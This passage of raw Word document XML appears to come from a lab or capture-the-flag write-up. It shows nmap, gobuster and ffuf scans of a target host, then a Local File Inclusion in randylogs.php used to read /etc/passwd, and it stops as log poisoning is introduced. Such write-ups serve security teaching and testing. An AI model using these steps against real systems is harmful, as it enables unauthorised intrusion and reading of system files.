      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="43DABC8A" w14:textId="2F189086" w:rsidR="00C1313B" w:rsidRDefault="4B444F3B" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc1005586306"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Exposed services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4FB399C1" w14:textId="37DA1169" w:rsidR="002C09AE" w:rsidRPr="00006ACF" w:rsidRDefault="002C09AE" w:rsidP="002C09AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt; </w:t>
      </w:r>
      <w:r w:rsidR="009874AB" w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>returned 2 services</w:t>
      </w:r>
      <w:r w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44175F66" w14:textId="77777777" w:rsidR="002C09AE" w:rsidRPr="00006ACF" w:rsidRDefault="002C09AE" w:rsidP="00450D7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A6728D" w14:textId="7046FDD5" w:rsidR="00450D7F" w:rsidRPr="00006ACF" w:rsidRDefault="00450D7F" w:rsidP="00006ACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C1313B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00006ACF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738546CA" w14:textId="11189C73" w:rsidR="00450D7F" w:rsidRDefault="00450D7F" w:rsidP="00006ACF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">80/tcp open  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C1313B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00450D7F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">    Apache httpd 2.4.41 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995FDA5" w14:textId="2E625C50" w:rsidR="00CC6C18" w:rsidRPr="00F71CAB" w:rsidRDefault="00CC6C18" w:rsidP="52E3155C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513801E3" w14:textId="3519959E" w:rsidR="00541CE6" w:rsidRPr="00A264C3" w:rsidRDefault="4B444F3B" w:rsidP="00CC6C18">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc2117415488"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Technology used in tool</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="14F92940" w14:textId="6A44171F" w:rsidR="008639B1" w:rsidRPr="005A0A9A" w:rsidRDefault="008639B1" w:rsidP="00CC6C18">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://10.81.180.174 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17274F1E" w14:textId="6395864D" w:rsidR="0024318D" w:rsidRDefault="6C325468" w:rsidP="00CC6C18">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">returned an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4042E6AC" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tasks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4042E6AC" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="64A0A06F" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B2F48E" w14:textId="15D9D39F" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23779438" w14:textId="3D7DF299" w:rsidR="0024318D" w:rsidRDefault="6E0AAE02" w:rsidP="00CC6C18">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D0B1A6" wp14:editId="76D28D1F">
            <wp:extent cx="3519377" cy="888732"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
            <wp:docPr id="3893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3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2645" cy="8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320F" w14:textId="3E0919FF" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57AF5715" w14:textId="3E613688" w:rsidR="00AD4AFA" w:rsidRDefault="4FA730A9" w:rsidP="00CC6C18">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Containing 1 file</w:t>
      </w:r>
      <w:r w:rsidR="6E0AAE02" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="6E0AAE02" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tasks_todo.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="6E0AAE02" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0277D903" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="3A6BC640" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="0277D903" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ich had this as content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED555FA" w14:textId="5CF8EC03" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6DA58A" w14:textId="58C2BD4F" w:rsidR="00CC6C18" w:rsidRPr="00F71CAB" w:rsidRDefault="000E0DEB" w:rsidP="00CC6C18">
      <w:r w:rsidRPr="000E0DEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48BE0697" wp14:editId="3D0FB1E9">
            <wp:extent cx="2191056" cy="638264"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16925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6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62F2" w14:textId="030549EC" w:rsidR="00CC6C18" w:rsidRPr="00F71CAB" w:rsidRDefault="00CC6C18" w:rsidP="00CC6C18"/>
    <w:p w14:paraId="4170F8F6" w14:textId="58D6D169" w:rsidR="007B3B34" w:rsidRPr="007F5667" w:rsidRDefault="407AB0B5" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From this we could conclude that the technology used is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49C853" w14:textId="5799C541" w:rsidR="007B3B34" w:rsidRPr="007F5667" w:rsidRDefault="00702786" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A857DD" w14:textId="421FFA3C" w:rsidR="007B3B34" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc512235083"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0A82B8B9" w14:textId="5B5D2F43" w:rsidR="00A875ED" w:rsidRDefault="4B444F3B" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc1360076993"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Initial user access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="31F3176C" w14:textId="77777777" w:rsidR="002D4FFE" w:rsidRDefault="002C0819" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://10.81.180.174/FUZZ -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/directory-list-2.3-medium.txt -e .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0A9A">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65A0CA23" w14:textId="77777777" w:rsidR="006A0F25" w:rsidRPr="005A0A9A" w:rsidRDefault="006A0F25" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527DC327" w14:textId="77E73EED" w:rsidR="00725763" w:rsidRDefault="053607BD" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="5D9C2DCA" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">igger list, faster tool to find </w:t>
      </w:r>
      <w:r w:rsidR="7512374C" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="5D9C2DCA" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> way in</w:t>
      </w:r>
      <w:r w:rsidR="00A264C3" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="3C9EFA98" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A264C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">this gave us some </w:t>
      </w:r>
      <w:r w:rsidR="33672C4F" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new results</w:t>
      </w:r>
      <w:r w:rsidR="3C9EFA98" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7D346" w14:textId="77777777" w:rsidR="00FF1AAE" w:rsidRPr="00196EDE" w:rsidRDefault="00FF1AAE" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B10BFA" w14:textId="349C677E" w:rsidR="00641053" w:rsidRDefault="006971B0" w:rsidP="005F5533">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5533">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blog-post</w:t>
      </w:r>
      <w:r w:rsidR="005546BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00887815" w:rsidRPr="00887815">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>archives</w:t>
      </w:r>
      <w:r w:rsidR="0081341B" w:rsidRPr="0081341B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0081341B" w:rsidRPr="0081341B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>randylogs.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DDC8B5C" w14:textId="1B05C86D" w:rsidR="005F5533" w:rsidRDefault="005546BC" w:rsidP="005546BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5533">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blog-post</w:t>
      </w:r>
      <w:r w:rsidR="00887815">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/uploads/</w:t>
      </w:r>
      <w:r w:rsidR="00136BE5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A327D" w14:textId="77777777" w:rsidR="00AD0E4F" w:rsidRDefault="00AD0E4F" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6811ADB2" w14:textId="41AE1855" w:rsidR="00A5185E" w:rsidRDefault="002F637B" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00AB3E93">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB3E93">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>randylogs.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00AB3E93">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB3E93" w:rsidRPr="002F637B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerable to Local File Inclusion</w:t>
      </w:r>
      <w:r w:rsidR="007265A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. U</w:t>
      </w:r>
      <w:r w:rsidR="2AF108C2" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sing the file param</w:t>
      </w:r>
      <w:r w:rsidR="610BB05E" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eter</w:t>
      </w:r>
      <w:r w:rsidR="1DD030B2" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we could read </w:t>
      </w:r>
      <w:r w:rsidR="07B80862" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="07B80862" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="07B80862" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidR="5C4C6198" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0A446" w14:textId="55C5D2DB" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28456A58" w14:textId="71DD0EEE" w:rsidR="00AC75C1" w:rsidRDefault="00AC75C1" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC75C1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4892A64A" wp14:editId="2C0C2DCE">
            <wp:extent cx="5731510" cy="1470660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4221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5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DBA8" w14:textId="77777777" w:rsidR="007F5667" w:rsidRDefault="007F5667" w:rsidP="00AD0E4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469FCEBD" w14:textId="10004B85" w:rsidR="003A6B4D" w:rsidRDefault="4BFF52D3" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="430C1E65" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> used l</w:t>
      </w:r>
      <w:r w:rsidR="67166A34" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>og pois</w:t>
      </w:r>
      <w:r w:rsidR="1AA2383C" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oning</w:t>
      </w:r>
